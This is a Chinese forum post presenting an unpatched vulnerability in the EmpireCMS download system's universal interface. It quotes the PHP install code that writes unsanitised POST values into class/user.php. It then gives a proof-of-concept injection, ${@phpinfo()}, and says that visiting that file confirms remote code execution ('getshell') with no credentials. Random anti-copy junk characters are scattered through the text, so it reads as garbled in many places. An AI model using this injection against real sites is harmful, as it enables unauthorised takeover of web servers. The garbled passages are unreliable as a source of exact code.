帝国万能接口漏洞0day

admin · 发表于 2013-1-23 09:34:37

这是帝国的一套下载系统如图 ps(不需要任何账户和密码，直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口，如图而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码当我们' ]0 ^: C: H, F9 a" ?0 [

3 [, L6 V& Y% O7 e4 V; H) }$ k

2 e0 W- l/ M8 f# W& Q  i2 Y5 I这是帝国的一套下载系统如图
' K6 |2 e5 d2 _ps(不需要任何账户和密码，直接写shell)
9 _, \0 |" U; J1 I! c% L, @$ O
由于很多站是由于下载要整合discuz 等等一些论坛....
' j* j# O9 n( M3 @# \( F
+ \/ ]: n# y5 L( D: |
而帝国他又有一个万能接口，如图

" d# K$ L! I+ m7 P! |' o6 l2 q9 y5 O: Y9 n# w7 X
; o7 M4 I: k1 L1 I; ?" d* o. `
而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码
$ R' m1 {. y) w# f4 J0 {' f6 ?+ @! m% m% J/ k1 X" a& f# {
当我们提交的时候，他地址是提交到index.php?install=1&setup=SetConfig
1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}
复制代码
他这里开始调用一个SetUserCOMConfig的函数了，我们继续跟踪+ e0 C# U6 Z: N7 K. n5 f6 n/ }
2 l8 N: a; e5 J7 B
在data/fun.php中的15行4 }! m2 w3 q( x. C' r5 M, q& o
( J) G( O* B* m% c- E3 ^
我们可以看到这个函数
1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
% {1 f8 R% @; @
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);
复制代码
.....//省略若干' i3 h' ]2 H, `* Q5 V

+ W+ O2 A$ d( ~+ u9 k; ~7 @这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
1 }  _" F: p3 N& S7 b/ G
8 o5 p* K( Q; g5 H( B; a% u/ M他将传进来的变量进行了切割，然后赋给了$filetext
- S7 \% i# M7 G, M- o+ ]) \- ]3 u1 Y3 b5 y3 C1 Q0 t2 T
然后看下面
1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
6. }
7. @fputs($fp,$filetext);
复制代码
打开了一个class/user.php文件，然后将$filetext写入了
/ v0 w& v; U' U* c7 `/ T$ w
* h( {, u' p- S" Y( |! i我们看看写入的结果，随便填一个

  D" Q6 t" H" D+ L) P
& D4 e2 h, ^% L5 S2 w" N4 }( J$ g
9 L! @& R& O$ d  p
7 p0 m. M: K4 [: T& u7 z- i
( |' J  P* M' w5 A$ Z" N2 u3 `

  h. ]8 r) I( y! ?6 K9 M
$ L2 Y4 G5 O7 K1 B
+ b! I# p$ @1 ^7 b7 ~
+ Y7 M7 k2 U; ^) v- |- S
# |9 \+ m5 u5 i$ i; p
% [# D4 O. ~3 ?* U" K& }0 X
: E* F% X3 K* P
# f/ u0 _( `4 R( A6 O2 ]! O) q, z" h7 R; Z3 A7 [8 S

  h# ~1 Y4 D; V' z: h- l7 k5 p) R0 N0 M* ?( \

& l7 Z+ {3 ?- S8 a2 x' U8 z7 @9 b8 ]3 e

8 O0 [2 R) ]: J2 {8 R0 C+ H! ?) h+ K) }* q* U7 C% e; r. I" D( w

所以我们淫荡点，写个${@phpinfo()}试试
; m+ E% j" W5 r  g8 j; L1 x3 s% ~

然后访问以下class/user.php这个文件
4 D  G/ ^9 |7 k# A日了吧
! t& s8 x4 U) V  N
0 N# ?/ [) ^! w5 G! u. o
% i: N8 n8 X) F( X

# S/ b: V2 ?% p% A" Y* q. T$ J+ k. l6 \( v, |

		自动登录	找回密码
密码			立即注册

帝国万能接口漏洞0day

本帖子中包含更多资源

浏览过的版块